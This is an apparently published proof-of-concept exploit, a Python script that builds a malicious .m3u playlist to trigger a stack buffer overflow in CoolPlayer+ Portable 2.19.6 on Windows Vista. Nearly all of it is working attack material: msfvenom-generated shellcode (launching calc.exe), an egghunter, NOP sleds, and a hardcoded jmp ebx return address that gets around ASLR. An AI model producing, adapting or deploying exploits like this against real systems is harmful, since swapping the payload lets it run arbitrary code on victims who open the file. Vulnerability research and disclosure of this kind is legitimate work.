# Exploit Title: [CoolPlayer+ Portable build 2.19.6 - .m3u Stack Overflow [Egghunter+ASLR bypass]] # Exploit Author: [Karn Ganeshen] # Download link: [https://sourceforge.net/projects/portableapps/files/CoolPlayer%2B%20Portable/CoolPlayerPlusPortable_2.19.6.paf.exe/download?use_mirror=liquidtelecom] # Version: [Current version 2.19.6] # Tested on: [Windows Vista Ultimate SP2] # # Couple of bof exploits for older versions already on EDB: # https://www.exploit-db.com/search/?action=search&description=coolplayer #!/usr/bin/python total_buf = 2000 filename="evil.m3u" # msfvenom -p windows/exec cmd=calc.exe -b \x00\x0a\x0c\0d EXITFUN=thread -f c # Payload size: 220 bytes shellcode = ("\xdb\xdc\xd9\x74\x24\xf4\x58\xbb\x9a\xc7\xdb\xe9\x31\xc9\xb1" "\x31\x31\x58\x18\x83\xe8\xfc\x03\x58\x8e\x25\x2e\x15\x46\x2b" "\xd1\xe6\x96\x4c\x5b\x03\xa7\x4c\x3f\x47\x97\x7c\x4b\x05\x1b" "\xf6\x19\xbe\xa8\x7a\xb6\xb1\x19\x30\xe0\xfc\x9a\x69\xd0\x9f" "\x18\x70\x05\x40\x21\xbb\x58\x81\x66\xa6\x91\xd3\x3f\xac\x04" "\xc4\x34\xf8\x94\x6f\x06\xec\x9c\x8c\xde\x0f\x8c\x02\x55\x56" "\x0e\xa4\xba\xe2\x07\xbe\xdf\xcf\xde\x35\x2b\xbb\xe0\x9f\x62" "\x44\x4e\xde\x4b\xb7\x8e\x26\x6b\x28\xe5\x5e\x88\xd5\xfe\xa4" "\xf3\x01\x8a\x3e\x53\xc1\x2c\x9b\x62\x06\xaa\x68\x68\xe3\xb8" "\x37\x6c\xf2\x6d\x4c\x88\x7f\x90\x83\x19\x3b\xb7\x07\x42\x9f" "\xd6\x1e\x2e\x4e\xe6\x41\x91\x2f\x42\x09\x3f\x3b\xff\x50\x55" "\xba\x8d\xee\x1b\xbc\x8d\xf0\x0b\xd5\xbc\x7b\xc4\xa2\x40\xae" "\xa1\x5d\x0b\xf3\x83\xf5\xd2\x61\x96\x9b\xe4\x5f\xd4\xa5\x66" "\x6a\xa4\x51\x76\x1f\xa1\x1e\x30\xf3\xdb\x0f\xd5\xf3\x48\x2f" "\xfc\x97\x0f\xa3\x9c\x79\xaa\x43\x06\x86") # Egghunter - 32 bytes eggh = ("\x66\x81\xca\xff\x0f\x42\x52\x6a" "\x02\x58\xcd\x2e\x3c\x05\x5a\x74" "\xef\xb8\x54\x30\x30\x57\x8b\xfa" "\xaf\x75\xea\xaf\x75\xe7\xff\xe7") # EIP overwrite appears to depend upon location from where the evil file is loaded from # Tested from location - C:\ # For e.g. offset will be different if file is loaded from C: (260) vs C:\Windows\ (249) junk = "A"*28 eip = "\xa1\x99\x42\x00" # 0x004299a1 jmp ebx - coolplayer+.exe [noaslr,norebase,nosafeseh] evil = junk + eggh + "\x90"*200 + eip + "\x90"*18 + "T00WT00W" + shellcode + "\x90"*1490 file = open(filename , 'w') file.write(evil) file.close()